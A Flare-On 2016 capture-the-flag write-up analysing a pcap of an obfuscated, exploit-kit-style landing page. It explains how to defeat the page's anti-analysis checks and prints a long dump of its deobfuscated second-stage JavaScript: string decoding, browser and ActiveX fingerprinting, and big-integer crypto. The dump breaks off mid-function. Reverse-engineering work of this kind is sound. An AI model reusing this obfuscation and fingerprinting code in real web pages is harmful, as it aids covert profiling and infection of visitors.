Friday, 4 November 2016

CTF Writeup - Flare-On 2016 - 10: flava


  • Name - flava
  • Category - Reverse Engineering
  • Points - 10
  • Description - n/a
  • Binary - Download here


The final Flare-on challenge was very long and tedious compared to the previous 9 put together. For a change we get a massive pcap rather than a binary file. The stream we're interested is 233, so set the filter to tcp.stream == 233. The communication is between 10.2.2.149 and 10.14.56.20 and the stream starts in the following way:


    GET / HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://10.11.106.81:18089/flareon_found_in_milpitas.html
    Accept-Language: en-US,en;q=0.5
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 10.14.56.20:18089
    DNT: 1
    Connection: Keep-Alive
    
    HTTP/1.1 200 OK
    Content-Type: text/html
    Date: Thu, 08 Sep 2016 23:42:05 GMT
    Connection: keep-alive
    Transfer-Encoding: chunked
    
    10d73
    <!DOCTYPE html>
    <html>
    <head>



The stream contains the following request/response pairs:
  1. GET request ('/') with a response containing an obfuscated landing page
  2. POST request ('/i_knew_you_were_trouble ') containing a base64 string with a response containing another base64 string
  3. GET request ('/will_tom_hiddleston_be_taylor_swifts_last_song_of_her_career.meh') with a response containing a Flash file
Extract the html landing page and the SWF file. We'll start off with the landing page first.

Part I: The Landing Page


The landing page looks something like this in IE:


Remove all the debugger; statements from the javascript and beautify the script. Do not remove any html content though as some of it is referenced form the javascript. If we run it, we don't get anything; not even errors. This is because the final part of the script is contained in a try-catch block:

    try {
        if (FiAwn == 1) {
            var U7weQ = new Function(i9mk);
            U7weQ();
            FiAwn = 2
        } 
        else {
            var O0fdFD = new Function(i9mk);
            O0fdFD(i9mk)
        }
    } catch (lol) {}

Removing the try-catch block, we get SyntaxError: Illegal character. The function Function() expects correct javascript to execute it. The script contains 3 validation routines which, if any of them fails, it produces the wrong output which is not javascript. The first check is the following (I've cleaned up the javascript):

    try {
        if (UytFdye['ScriptEngineBuildVersion']() === 545) {
            utaNfs = 0;
        } else {
            utaNfs = 2;
        }
    } catch (e) {
        utaNfs = 4;
    }
    LiZAqJ = utaNfs;


This ScriptEngineBuildVersion function will only work in IE. If Firefox or Chrome is used, we end up in the catch statement. We require LiZAqJ to be 0; let's change the code to force this. The second change we have to preform is in this section:

    if (ruHGNbQNzSlh && (!ruHGNbQNzSlh['out' + 'er' + HGLsdfij] || ruHGNbQNzSlh[u9Zdsjl] < (35144 ^ 35912))) {
        DM7w7I = 1;
    } 
    else {
        var IhUgy = new Date();
        DM7w7I = (IhUgy - JKhURsf > 100) ? 3 : 0
    }

The variable DM7w7I has to be set to 0. And the last validation routine compares today's date with the 9th of September 2016:

    function UIgvkFSsu() {
        //oiHqEd = 9th of September 2016
        //JKhURsf = today's date
        if (JKhURsf < oiHqEd) {
            return true;
        } 
        else {
            return false;
        }
    }

We require our date to be smaller than the fixed date so the function returns true. As it's a bit of a hassle to travel to the past, we'll settle with modifying the code to always return true. Instead of calling the new javascript, we would like to get a copy of it, so modify Function(i9mk) to read document.write(i9mk) (putting it between pre statement might help), open the page and copy the printed javascript into a new file for further analysis.

I have provided a copy of the 2nd javascript layer for reference and just in case anyone would like a copy:

function k() {
    String['prototype']['kek'] = function(a, b, c, d) {
        var e = '';
        a = unescape(a);
        for (var f = 0; f < a['length']; f++) {
            var g = b ^ a['charCodeAt'](f);
            e += String['fromCharCode'](g);
            b = (b * c + d) & 0xFF;
        }
        return e;
    }, String['prototype']['' ['kek']('%0B%5Ei', 108, 41, 237)] = function() {
        return '' ['kek']('%C96%E4B%3Ei_%83n%C1%82%FB%DC%01%EAA+o', 175, 129, 43);
    }, String['prototype']['' ['kek']('6%87%24', 94, 13, 297)] = function() {
        return '' ['kek']('4%94%0D%86%7BVXJ%AD%1C%87%0E%FE%C0%DA%D2%20%82%01%ACWAJd%B6%06%8D/', 92, 33, 31);
    };

    try {
        m();
        var a = l();
        var b = Function(a);
        b();
    } catch (zzzzz) {}
}

try {
    k();
} catch (z) {}

function m() {
    String['prototype']['lol'] = String['prototype']['>_<'] = String['prototype']['o3o'] = String['prototype']['>_O'] = String['prototype']['-Q-'] = String['prototype']['Orz'] = String['prototype']['^_^'] = String['prototype']['OGC'] = String['prototype']['O_o'] = String['prototype']['-,-'] = String['prototype']['kek'];
    window.fvOWbauMcjLj = window.fvOWbauMcjLs = window.fvOWbauMcjLf1 = window.fvOWbauMcjLf2 = '' ['-Q-'];

    window.gFVaUK = false;
    window.LAAOEpH = false;
    window['rghv3ee'] = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
    window['wdns9Ie'] = 'ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210+/=';
    window['UoqK1Yl'] = window['wdns9Ie'];
}


function j() {
    var blah;
    var a = navigator,
        b = 0;
    if (a[window.fvOWbauMcjLj('u%B2%C7%D1%85b%03%89%FC', 0, 33, 193)][window.fvOWbauMcjLf2('xV%BBc%D5%9B%1D', 17, 129, 167)](window.fvOWbauMcjLs('%CC%E5%22%E5', 129, 129, 181)) == -1 && a[window.fvOWbauMcjLf1('Q%85%BE%5DYC%89%8E%E7%C3', 48, 5, 5)][window.fvOWbauMcjLs('%EF%CD%F4%28%A2x%02', 134, 17, 189)](window.fvOWbauMcjLj('%D67%7D%7B3%07%BC%8C', 130, 5, 187)) == -1) {
        window.gFVaUK = true;
    }
    var c = window.fvOWbauMcjLj('%F3%C2M%F9%E1%5D%F9%FE%29%95%9F%C4J.P', 184, 17, 107) + window.fvOWbauMcjLf2('t%B4%C3%CF%8F%60%1F%85%E7%28', 0, 33, 193) + window.fvOWbauMcjLs('r%A5%F2%CF%B1b%0F%89%A6%03K%5D-%FE%8D%1Dy%A1%C6%F2%A4%7C', 0, 33, 193);

    var d = c,
        e = c + window.fvOWbauMcjLf1('%3F%09', 17, 129, 167),
        f = c + window.fvOWbauMcjLj('%AF%824%95%0A%BA%11E', 129, 129, 181);

    try {
        blah = new ActiveXObject(d);
    } catch (w) {
        blah = false;
        try {
            blah = new ActiveXObject(e);
        } catch (w) {
            blah = false;
            try {
                blah = new ActiveXObject(f);
            } catch (w) {
                blah = false;
            }
        }
    }
    if (blah) {
        window.LAAOEpH = true;
    }

    if (!window.gFVaUK && !window.LAAOEpH) {
        window['UoqK1Yl'] = window['rghv3ee'];
    } else {
        window['UoqK1Yl'] = window['wdns9Ie'];
    }
}

function l() {
    j();
    var a = "var Il1Ib = Math, Il1Ic = String, Il1IIll1a = JSON, Il1IIll1b = XMLHttpRequest;
var Il1Ie = ''['lol']('9%E44%BC%1Ap', 90, 9, 97),
 Il1If = ''['>_<']('%D0%94%18F%A5%C0', 162, 5, 199),
 Il1Ig = ''['OGC']('%B7%5By4%B6%B4w', 199, 33, 147),
 Il1Ih = ''['-Q-']('%B7j%16%9E%04%88%E4%3Ej', 199, 17, 225),
 Il1I = ''['>_O']('%DB%FCy%7D%E1', 168, 129, 247),
 Il1Ii = ''['o3o']('%C4J%13sI%F7%3D', 173, 5, 195),
 Il1Ij = ''['Orz']('%D6%E4zP%20%EC', 181, 9, 47),
 Il1Ik = ''['Orz']('F%92%1C%D5%DF%02', 52, 65, 191),
 Il1Il = ''['^_^']('%3Eq%01%F4%C7G%FB%B7%F34%A2%94', 88, 65, 171),
 Il1Im = ''['^_^']('%DFu%5C_c', 190, 33, 135),
 Il1In = ''['lol']('%FA%5E%1A%F6V%9F', 150, 5, 77),
 Il1Io = ''['>_<']('%F9S%F8%AE%BB%11%89q', 141, 65, 111),
 Il1Ip = ''['OGC']('%03%F7%B7%B7o%A4%06%D49%03', 96, 9, 63),
 Il1Iq = ''['O_o']('%C3%BE%10%C3+', 165, 129, 173),
 Il1Ir = ''['lol']('%D4%1B%E7M', 167, 33, 235);
var Il1IbbAa = ''['>_O']('%10%8D%81%CE%17%A9y9%5B%F0%3Bx%DE%3FC%EB%85%FD%EE%8A%80%FAy%9D%CC%A11%D4KH%23%AF6.%84%5D%28%D8%06dg%24%26%E0%E3%8E0s%A8%1F%B1%10%AF%1B%09%03%E3%02%EBR%5C%A9%13%E5%E3O%3E%BC%E6d%29%C7*3%C1C%A9%FA%13%D2t%B0thY%86O3', 65, 5, 147);
var Il1Ibbss = ''['-,-']('*%F1m%891%82', 89, 33, 11),
 Il1Ibbso = 6, Il1Ibbsi = 2, Il1Ibbsn = 10; 
var Il1Ibbsa = ''['O_o']('G%02n%1FeB%93%7C%BF%8B%FA%80%F9%AF%1B%C3', 52, 129, 51),
 Il1Ibbsb = ''['-Q-']('%9F%23%ABO', 240, 9, 227),
 Il1Ibbsc = ''['Orz']('%EE%DB1%E4', 157, 129, 161),
 Il1Ibbsd = ''['Orz']('%AFUd4%8D%83%3B%8El%F2%1A%CC%27W%FB%3B%17%8E', 192, 33, 123),
 Il1Ibbse = ''['^_^']('%08%C0%F1_%DF%82%C8%06%A6%98', 122, 65, 171),
 Il1Ibbsf = ''['O_o']('1%FDi%0B%DB%26', 66, 9, 55),
 Il1Ibbsg = ''['-,-']('lTC%3B%ED%A3%7C%10%9E', 31, 17, 17),
 Il1Ibbsh = ''['>_<']('G%E1%7B%A1%BE', 55, 65, 137),
 Il1Ibbsl = escape,
 Il1Ibbsj = unescape,
 Il1Ibbsk = ''['o3o']('%09mFr%00%12Z%137%95e%9E', 123, 33, 45),
 Il1Ibbsp = ''['o3o']('s%DD%A2%14', 35, 17, 63),
 Il1Ibbst = false;

Il1IZ = function(i)
{
 var k = ''['-,-']('%8EJJV%26z%9A%CE%3E%BAz6FjJ%BEN%8A%0A%B6', 207, 9, 193) + ''['O_o']('%5E%C0.%2C%1E%E8%142%60*%94%CAX%02%84%E2%90j%04%8AXR%14%B2%80%CA%94j', 11, 9, 51) + ''['Orz']('%1A%B6%16*A%E3AgA%E3AoA%E3Ps@', 109, 65, 33);
 var o = '';
 var t = 0;
 while (t < i[Il1In])
 {
 var c1 = i[Il1Ip](t++);
 var c2 = i[Il1Ip](t++);
 var c3 = i[Il1Ip](t++);
 var e1 = c1 >> 2;
 var e2 = ((c1 & 3) << 4) | (c2 >> 4);
 var e3 = ((c2 & 15) << 2) | (c3 >> 6);
 var e4 = c3 & 63;
 if (isNaN(c2))
 {
 e3 = e4 = 64;
 }
 else if (isNaN(c3))
 {
 e4 = 64;
 }
 o += k[Il1Ij](e1) + k[Il1Ij](e2) + k[Il1Ij](e3) + k[Il1Ij](e4);
 }
 return o;
}

Il1IY = function(i)
{
 var k = ''['OGC']('KoS%F7S%7F%5B%F7k%0Fc%87c%1F%7B%87k%0F%13%B7', 10, 65, 163) + ''['OGC']('A%91%11%99qq%5B%E7%9F+%8Bo%F7%5B%0B%27%8F%BB%FB%3F%97K%FBg%BF+K%EF', 20, 5, 99) + ''['OGC']('%17%EB%FFC%9C%EE%E0%B6%CC%1E%28%E6%7CNA2%AD', 96, 65, 51);
 var o = '';
 var r = /[^A-Za-z0-9\+\/\=]/g;
 i = i.replace(r, '');
 var t = 0;

 while (t < i[Il1In])
 {
 var e1 = k[Il1Ii](i[Il1Ij](t++));
 var e2 = k[Il1Ii](i[Il1Ij](t++));
 var e3 = k[Il1Ii](i[Il1Ij](t++));
 var e4 = k[Il1Ii](i[Il1Ij](t++));
 var c1 = (e1 << 2) | (e2 >> 4);
 var c2 = ((e2 & 15) << 4) | (e3 >> 2);
 var c3 = ((e3 & 3) << 6) | e4;
 o += Il1Ic[Il1Il](c1);
 if (e3 != 64)
 {
 o += Il1Ic[Il1Il](c2);
 }
 if (e4 != 64)
 {
 o += Il1Ic[Il1Il](c3);
 }
 }
 return o;
};


(function(){
 var Il1Is, Il1It;

 function Il1Iu(a,b,c) {
 if(a != null)
 if('number' == typeof a) this.Il1Iba(a,b,c);
 else if(b == null && 'string' != typeof a) this.Il1Iw(a,256);
 else this.Il1Iw(a,b);
 }

 function Il1Ix() { return new Il1Iu(null); }

 function Il1Ica(i,x,w,j,c,n) {
 while(--n >= 0) {
 var v = x*this[i++]+w[j]+c;
 c = Il1Ib[Il1Iq](v/67108864);
 w[j++] = v&67108863;
 }
 return c;
 }

 function Il1Ida(i,x,w,j,c,n) {
 var xl = x&32767, xh = x>>15;
 while(--n >= 0) {
 var l = this[i]&32767;
 var h = this[i++]>>15;
 var m = xh*l+h*xl;
 l = xl*l+((m&32767)<<15)+w[j]+(c&1073741823);
 c = (l>>>30)+(m>>>15)+xh*h+(c>>>30);
 w[j++] = l&1073741823;
 }
 return c;
 }

 function Il1Iea(i,x,w,j,c,n) {
 var xl = x&16383, xh = x>>14;
 while(--n >= 0) {
 var l = this[i]&16383;
 var h = this[i++]>>14;
 var m = xh*l+h*xl;
 l = xl*l+((m&16383)<<14)+w[j]+c;
 c = (l>>28)+(m>>14)+xh*h;
 w[j++] = l&268435455;
 }
 return c;
 }

 var Il1Igg = typeof navigator !== 'undefined';
 if(Il1Igg && (navigator.appName == ''['O_o']('li%AC%FCR%AF%04%8C-%98N%28%01%F1%D1%CC%F4%04%1F%BB%D5%3C%B75%BBM%05', 33, 17, 207))) {
 Il1Iu[Il1Ih].am = Il1Ida;
 Il1It = 30;
 }
 else if (Il1Igg && (navigator.appName != ''['-,-']('%13%93%7B%DB%A2%3B%03i', 93, 129, 25))) {
 Il1Iu[Il1Ih].am = Il1Ica;
 Il1It = 26;
 }
 else {
 Il1Iu[Il1Ih].am = Il1Iea;
 Il1It = 28;
 }

 Il1Is = Il1Iu[Il1Ih];

 Il1Is.DB = Il1It;
 Il1Is.DM = ((1<<Il1It)-1);
 Il1Is.DV = (1<<Il1It);

 Il1Is.FV = Il1Ib.pow(2,52);
 Il1Is.F1 = 52-Il1It;
 Il1Is.F2 = 2*Il1It-52;

 var Il1Ifa = ''['lol']('%9B%97K%D7%93%B7%03%B7%1B%E7%10%FE%7C%DEH%5E%FC%7E%00%3E%FC%9EH%9E%7C%3E%10%7E%7C%5Eh%DE%FC%FE%20%BE', 171, 9, 163);
 var Il1Iz = new Array();
 var Il1IA,Il1IB;
 Il1IA = '0'[Il1Ip](0);
 for(Il1IB = 0; Il1IB <= 9; ++Il1IB) Il1Iz[Il1IA++] = Il1IB;
 Il1IA = 'a'[Il1Ip](0);
 for(Il1IB = 10; Il1IB < 36; ++Il1IB) Il1Iz[Il1IA++] = Il1IB;
 Il1IA = 'A'[Il1Ip](0);
 for(Il1IB = 10; Il1IB < 36; ++Il1IB) Il1Iz[Il1IA++] = Il1IB;

 function Il1Ii2c(n) { return Il1Ifa[Il1Ij](n); }

 function Il1Iga(s,i) {
 var c = Il1Iz[s[Il1Ip](i)];
 return (c==null)?-1:c;
 }

 function Il1Iebn(r) {
 for(var i = this.t-1; i >= 0; --i) r[i] = this[i];
 r.t = this.t;
 r.s = this.s;
 }

 function Il1IDbn(x) {
 this.t = 1;
 this.s = (x<0)?-1:0;
 if(x > 0) this[0] = x;
 else if(x < -1) this[0] = x+this.DV;
 else this.t = 0;
 }

 function Il1IC(i) { var r = Il1Ix(); r.Il1ID(i); return r; }

 function Il1Iwbn(s,b) {
 var k;
 if(b == 16) k = 4;
 else if(b == 8) k = 3;
 else if(b == 256) k = 8;
 else if(b == 2) k = 1;
 else if(b == 32) k = 5;
 else if(b == 4) k = 2;
 else { this.Il1Ill1f(s,b); return; }
 this.t = 0;
 this.s = 0;
 var i = s.length, mi = false, sh = 0;
 while(--i >= 0) {
 var x = (k==8)?s[i]&255:Il1Iga(s,i);
 if(x < 0) {
 if(s.charAt(i) == '-') mi = true;
 continue;
 }
 mi = false;
 if(sh == 0)
 this[this.t++] = x;
 else if(sh+k > this.DB) {
 this[this.t-1] |= (x&((1<<(this.DB-sh))-1))<<sh;
 this[this.t++] = (x>>(this.DB-sh));
 }
 else
 this[this.t-1] |= x<<sh;
 sh += k;
 if(sh >= this.DB) sh -= this.DB;
 }
 if(k == 8 && (s[0]&128) != 0) {
 this.s = -1;
 if(sh > 0) this[this.t-1] |= ((1<<(this.DB-sh))-1)<<sh;
 }
 this.Il1IN();
 if(mi) Il1IL.Il1IM(this,this);
 }

 function Il1INbn() {
 var c = this.s&this.DM;
 while(this.t > 0 && this[this.t-1] == c) --this.t;
 }

 function Il1Ill1cbn(r) { return Il1Ib.floor(Il1Ib.LN2*this.DB/Il1Ib.log(r));}

 function Il1Ill1mbn(n) {
 this[this.t] = this.am(0,n-1,this,0,0,this.t);
 ++this.t;
 this.Il1IN();
 }

 function Il1Ill1nbn() {
 if(this.s < 0) return -1;
 else if(this.t <= 0 || (this.t == 1 && this[0] <= 0)) return 0;
 else return 1;
 }

 function Il1Ill1ibn() {
 if(this.s < 0) {
 if(this.t == 1) return this[0]-this.DV;
 else if(this.t == 0) return -1;
 }
 else if(this.t == 1) return this[0];
 else if(this.t == 0) return 0;
 return ((this[1]&((1<<(32-this.DB))-1))<<this.DB)|this[0];
 }

 function Il1Ill1tbn(b) {
 if(b == null) b = 10;
 if(this.Il1Ill1n() == 0 || b < 2 || b > 36) return '0';
 var cs = this.Il1Ill1c(b);
 var a = Il1Ib.pow(b,cs);
 var d = Il1IC(a), y = Il1Ix(), z = Il1Ix(), r = '';
 this.Il1IH(d,y,z);
 while(y.Il1Ill1n() > 0) {
 r = (a+z.Il1Ill1i()).toString(b).substr(1) + r;
 y.Il1IH(d,y,z);
 }
 return z.Il1Ill1i().toString(b) + r;
 }

 function Il1Ill1fbn(s,b) {
 this.Il1ID(0);
 if(b == null) b = 10;
 var cs = this.Il1Ill1c(b);
 var d = Il1Ib.pow(b,cs), mi = false, j = 0, w = 0;
 for(var i = 0; i < s.length; ++i) {
 var x = Il1Iga(s,i);
 if(x < 0) {
 if(s.charAt(i) == '-' && this.Il1Ill1n() == 0) mi = true;
 continue;
 }
 w = b*w+x;
 if(++j >= cs) {
 this.Il1Ill1m(d);
 this.Il1IQ(w,0);
 j = 0;
 w = 0;
 }
 }
 if(j > 0) {
 this.Il1Ill1m(Il1Ib.pow(b,j));
 this.Il1IQ(w,0);
 }
 if(mi) Il1IL.Il1IM(this,this);
 }

 function Il1Ill1s(b) {
 if(this.s < 0) return '-'+this.Il1Ill1o().toString(b);
 var k;
 if(b == 16) k = 4;
 else if(b == 8) k = 3;
 else if(b == 2) k = 1;
 else if(b == 32) k = 5;
 else if(b == 4) k = 2;
 else return this.Il1Ill1t(b);
 var km = (1<<k)-1, d, m = false, r = '', i = this.t;
 var p = this.DB-(i*this.DB)%k;
 if(i-- > 0) {
 if(p < this.DB && (d = this[i]>>p) > 0) { m = true; r = Il1Ii2c(d); }
 while(i >= 0) {
 if(p < k) {
 d = (this[i]&((1<<p)-1))<<(k-p);
 d |= this[--i]>>(p+=this.DB-k);
 }
 else {
 d = (this[i]>>(p-=k))&km;
 if(p <= 0) { p += this.DB; --i; }
 }
 if(d > 0) m = true;
 if(m) r += Il1Ii2c(d);
 }
 }
 return m?r:'0';
 }

 function Il1Ill1obn() { var r = Il1Ix(); Il1IL.Il1IM(this,r); return r; }

 function Il1Ill1abn() { return (this.s<0)?this.Il1Ill1o():this; }

 function Il1IGbn(a) {
 var r = this.s-a.s;
 if(r != 0) return r;
 var i = this.t;
 r = i-a.t;
 if(r != 0) return (this.s<0)?-r:r;
 while(--i >= 0) if((r=this[i]-a[i]) != 0) return r;
 return 0;
 }

 function Il1IE(x) {
 var r = 1, t;
 if((t=x>>>16) != 0) { x = t; r += 16; }
 if((t=x>>8) != 0) { x = t; r += 8; }
 if((t=x>>4) != 0) { x = t; r += 4; }
 if((t=x>>2) != 0) { x = t; r += 2; }
 if((t=x>>1) != 0) { x = t; r += 1; }
 return r;
 }

 function Il1Imabn() {
 if(this.t <= 0) return 0;
 return this.DB*(this.t-1)+Il1IE(this[this.t-1]^(this.s&this.DM));
 }

 function Il1IKbn(n,r) {
 var i;
 for(i = this.t-1; i >= 0; --i) r[i+n] = this[i];
 for(i = n-1; i >= 0; --i) r[i] = 0;
 r.t = this.t+n;
 r.s = this.s;
 }

 function Il1IObn(n,r) {
 for(var i = n; i < this.t; ++i) r[i-n] = this[i];
 r.t = Il1Ib.max(this.t-n,0);
 r.s = this.s;
 }

 function Il1IRbn(n,r) {
 var bs = n%this.DB;
 var cbs = this.DB-bs;
 var bm = (1<<cbs)-1;
 var ds = Math.floor(n/this.DB), c = (this.s<<bs)&this.DM, i;
 for(i = this.t-1; i >= 0; --i) {
 r[i+ds+1] = (this[i]>>cbs)|c;
 c = (this[i]&bm)<<bs;
 }
 for(i = ds-1; i >= 0; --i) r[i] = 0;
 r[ds] = c;
 r.t = this.t+ds+1;
 r.s = this.s;
 r.Il1IN();
 }

 function Il1ISbn(n,r) {
 r.s = this.s;
 var ds = Math.floor(n/this.DB);
 if(ds >= this.t) { r.t = 0; return; }
 var bs = n%this.DB;
 var cbs = this.DB-bs;
 var bm = (1<<bs)-1;
 r[0] = this[ds]>>bs;
 for(var i = ds+1; i < this.t; ++i) {
 r[i-ds-1] |= (this[i]&bm)<<cbs;
 r[i-ds] = this[i]>>bs;
 }
 if(bs > 0) r[this.t-ds-1] |= (this.s&bm)<<cbs;
 r.t = this.t-ds;
 r.Il1IN();
 }

 function Il1IMbn(a,r) {
 var i = 0, c = 0, m = Math.min(a.t,this.t);
 while(i < m) {
 c += this[i]-a[i];
 r[i++] = c&this.DM;
 c >>= this.DB;
 }
 if(a.t < this.t) {
 c -= a.s;
 while(i < this.t) {
 c += this[i];
 r[i++] = c&this.DM;
 c >>= this.DB;
 }
 c += this.s;
 }
 else {
 c += this.s;
 while(i < a.t) {
 c -= a[i];
 r[i++] = c&this.DM;
 c >>= this.DB;
 }
 c -= a.s;
 }
 r.s = (c<0)?-1:0;
 if(c < -1) r[i++] = this.DV+c;
 else if(c > 0) r[i++] = c;
 r.t = i;
 r.Il1IN();
 }

 function Il1IIbn(a,r) {
 var x = this.Il1Ill1a(), y = a.Il1Ill1a();
 var i = x.t;
 r.t = i+y.t;
 while(--i >= 0) r[i] = 0;
 for(i = 0; i < y.t; ++i) r[i+x.t] = x.am(0,y[i],r,i,0,x.t);
 r.s = 0;
 r.Il1IN();
 if(this.s != a.s) Il1IL.Il1IM(r,r);
 }

 function Il1IJbn(r) {
 var x = this.Il1Ill1a();
 var i = r.t = 2*x.t;
 while(--i >= 0) r[i] = 0;
 for(i = 0; i < x.t-1; ++i) {
 var c = x.am(i,x[i],r,2*i,0,1);
 if((r[i+x.t]+=x.am(i+1,2*x[i],r,2*i+1,c,x.t-i-1)) >= x.DV) {
 r[i+x.t] -= x.DV;
 r[i+x.t+1] = 1;
 }
 }
 if(r.t > 0) r[r.t-1] += x.am(i,x[i],r,2*i,0,1);
 r.s = 0;
 r.Il1IN();
 }

 function Il1IHbn(m,q,r) {
 var pm = m.Il1Ill1a();
 if(pm.t <= 0) return;
 var pt = this.Il1Ill1a();
 if(pt.t < pm.t) {
 if(q != null) q.Il1ID(0);
 if(r != null) this[Il1Ie](r);
 return;
 }
 if(r == null) r = Il1Ix();
 var y = Il1Ix(), ts = this.s, ms = m.s;
 var nsh = this.DB-Il1IE(pm[pm.t-1]);
 if(nsh > 0) { pm.Il1IR(nsh,y); pt.Il1IR(nsh,r); }
 else { pm[Il1Ie](y); pt[Il1Ie](r); }
 var ys = y.t;
 var y0 = y[ys-1];
 if(y0 == 0) return;
 var yt = y0*(1<<this.F1)+((ys>1)?y[ys-2]>>this.F2:0);
 var d1 = this.FV/yt, d2 = (1<<this.F1)/yt, e = 1<<this.F2;
 var i = r.t, j = i-ys, t = (q==null)?Il1Ix():q;
 y.Il1IK(j,t);
 if(r.Il1IG(t) >= 0) {
 r[r.t++] = 1;
 r.Il1IM(t,r);
 }
 Il1IT.Il1IK(ys,t);
 t.Il1IM(y,y);
 while(y.t < ys) y[y.t++] = 0;
 while(--j >= 0) {
 var qd = (r[--i]==y0)?this.DM:Math.floor(r[i]*d1+(r[i-1]+e)*d2);
 if((r[i]+=y.am(0,qd,r,j,0,ys)) < qd) {
 y.Il1IK(j,t);
 r.Il1IM(t,r);
 while(r[i] < --qd) r.Il1IM(t,r);
 }
 }
 if(q != null) {
 r.Il1IO(ys,q);
 if(ts != ms) Il1IL.Il1IM(q,q);
 }
 r.t = ys;
 r.Il1IN();
 if(nsh > 0) r.Il1IS(nsh,r);
 if(ts < 0) Il1IL.Il1IM(r,r);
 }

 function Il1IUbn() { return ((this.t>0)?(this[0]&1):this.s) == 0; }

 Il1Is = Il1Iu[Il1Ih];
 Il1Is.copyTo = Il1Iebn;
 Il1Is.Il1ID = Il1IDbn;
 Il1Is.Il1Iw = Il1Iwbn;
 Il1Is.Il1IN = Il1INbn;
 Il1Is.Il1IK = Il1IKbn;
 Il1Is.Il1IO = Il1IObn;
 Il1Is.Il1IR = Il1IRbn;
 Il1Is.Il1IS = Il1ISbn;
 Il1Is.Il1IM = Il1IMbn;
 Il1Is.Il1II = Il1IIbn;
 Il1Is.Il1IJ = Il1IJbn;
 Il1Is.Il1IH = Il1IHbn;
 Il1Is.Il1Ill1e = Il1Ill1ebn;
 Il1Is.Il1IU = Il1IUbn;

 Il1Is.Il1Ill1c = Il1Ill1cbn;
 Il1Is.Il1Ill1t = Il1Ill1tbn;
 Il1Is.Il1Ill1f = Il1Ill1fbn;
 Il1Is.Il1Ill1m = Il1Ill1mbn;
 Il1Is.Il1Ill1n = Il1Ill1nbn;
 Il1Is.Il1Ill1i = Il1Ill1ibn;
 Il1Is.Il1Ill1o = Il1Ill1obn;
 Il1Is.toString = Il1Ill1s;
 Il1Is.Il1Ill1a = Il1Ill1abn;
 Il1Is.Il1IG = Il1IGbn;
 Il1Is.Il1Ima = Il1Imabn;

 Il1IL = Il1IC(0);
 Il1IT = Il1IC(1);

 function Il1Ill1dbn(a) { var r = Il1Ix(); this.Il1IH(a,r,null); return r; }

 function Il1Ill1ebn() {
 if(this.t < 1) return 0;
 var x = this[0];
 if((x&1) == 0) return 0;
 var y = x&3;
 y = (y*(2-(x&15)*y))&15;
 y = (y*(2-(x&255)*y))&255;
 y = (y*(2-(((x&65535)*y)&65535)))&65535;
 y = (y*(2-x*y%this.DV))%this.DV;
 return (y>0)?this.DV-y:-y;
 }

 function Il1IQbn(n,w) {
 if(n == 0) return;
 while(this.t <= w) this[this.t++] = 0;
 this[w] += n;
 while(this[w] >= this.DV) {
 this[w] -= this.DV;
 if(++w >= this.t) this[this.t++] = 0;
 ++this[w];
 }
 }

 function Il1Ill1mlbn(a,n,r) {
 var i = Math.min(this.t+a.t,n);
 r.s = 0;
 r.t = i;
 while(i > 0) r[--i] = 0;
 var j;
 for(j = r.t-this.t; i < j; ++i) r[i+this.t] = this.am(0,a[i],r,i,0,this.t);
 for(j = Math.min(a.t,n); i < j; ++i) this.am(0,a[i],r,i,0,n-i);
 r.Il1IN();
 }

 function Il1Ill1mubn(a,n,r) {
 --n;
 var i = r.t = this.t+a.t-n;
 r.s = 0;
 while(--i >= 0) r[i] = 0;
 for(i = Math.max(n-this.t,0); i < a.t; ++i)
 r[this.t+i-n] = this.am(n-i,a[i],r,0,0,this.t+i-n);
 r.Il1IN();
 r.Il1IO(1,r);
 }

 function Il1Ibabn(a,b,c) {
 return null;
 }

 function Il1IF(m) { this.m = m; }
 function Il1IFpa(x) {
 if(x.s < 0 || x.Il1IG(this.m) >= 0) return x.mod(this.m);
 else return x;
 }

 function Il1IFsa(x) { return x; }
 function Il1IFre(x) { x.Il1IH(this.m,null,x); }
 function Il1IFja(x,y,r) { x.Il1II(y,r); this[Il1If](r); }
 function Il1IFP(x,r) { x.Il1IJ(r); this[Il1If](r); }

 Il1Is = Il1IF[Il1Ih];
 Il1Is.pa = Il1IFpa;
 Il1Is.sa = Il1IFsa;
 Il1Is.reduce = Il1IFre;
 Il1Is.ja = Il1IFja;
 Il1Is.P = Il1IFP;

 function Il1Ioa(m) {
 this.r2 = Il1Ix();
 this.q3 = Il1Ix();
 Il1IT.Il1IK(2*m.t,this.r2);
 this.mu = this.r2.Il1Ill1d(m);
 this.m = m;
 }

 function Il1Ioapa(x) {
 if(x.s < 0 || x.t > 2*this.m.t) return x.mod(this.m);
 else if(x.Il1IG(this.m) < 0) return x;
 else { var r = Il1Ix(); x[Il1Ie](r); this[Il1If](r); return r; }
 }

 function Il1Ioasa(x) { return x; }

 function Il1Ioare(x) {
 x.Il1IO(this.m.t-1,this.r2);
 if(x.t > this.m.t+1) { x.t = this.m.t+1; x.Il1IN(); }
 this.mu.Il1Ill1mu(this.r2,this.m.t+1,this.q3);
 this.m.Il1Ill1ml(this.q3,this.m.t+1,this.r2);
 while(x.Il1IG(this.r2) < 0) x.Il1IQ(1,this.m.t+1);
 x.Il1IM(this.r2,x);
 while(x.Il1IG(this.m) >= 0) x.Il1IM(this.m,x);
 }

 function Il1IoaP(x,r) { x.Il1IJ(r); this[Il1If](r); }

 function Il1Ioaja(x,y,r) { x.Il1II(y,r); this[Il1If](r); }

 Il1Is = Il1Ioa[Il1Ih];
 Il1Is.pa = Il1Ioapa;
 Il1Is.sa = Il1Ioasa;
 Il1Is.reduce = Il1Ioare;
 Il1Is.ja = Il1Ioaja;
 Il1Is.P = Il1IoaP;


 function Il1Iia(m) {
 this.m = m;
 this.mp = m.Il1Ill1e();
 this.mpl = this.mp&32767;
 this.mph = this.mp>>15;
 this.um = (1<<(m.DB-15))-1;
 this.mt2 = 2*m.t;
 }

 function Il1Iiapa(x) {
 var r = Il1Ix();
 x.Il1Ill1a().Il1IK(this.m.t,r);
 r.Il1IH(this.m,null,r);
 if(x.s < 0 && r.Il1IG(Il1IL) > 0) this.m.Il1IM(r,r);
 return r;
 }

 function Il1Iiasa(x) {
 var r = Il1Ix();
 x[Il1Ie](r);
 this[Il1If](r);
 return r;
